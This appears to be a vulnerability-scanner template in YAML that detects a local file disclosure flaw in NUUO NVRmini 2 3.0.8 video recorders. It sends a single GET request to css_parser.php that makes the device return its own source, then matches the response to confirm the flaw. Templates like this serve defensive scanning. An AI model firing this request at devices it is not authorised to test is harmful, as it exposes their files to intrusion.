27 lines
546 B
YAML
27 lines
546 B
YAML
|
id: nuuo-file-inclusion.yaml
|
||
|
info:
|
||
|
name: NUUO NVRmini 2 3.0.8 Local File Disclosure
|
||
|
author: princechaddha
|
||
|
severity: high
|
||
|
reference: https://www.exploit-db.com/exploits/40211
|
||
|
tags: nuuo,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/css_parser.php?css=css_parser.php"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "$_GET['css']"
|
||
|
part: body
|
||
|
- type: word
|
||
|
words:
|
||
|
- "text/css"
|
||
|
part: header
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|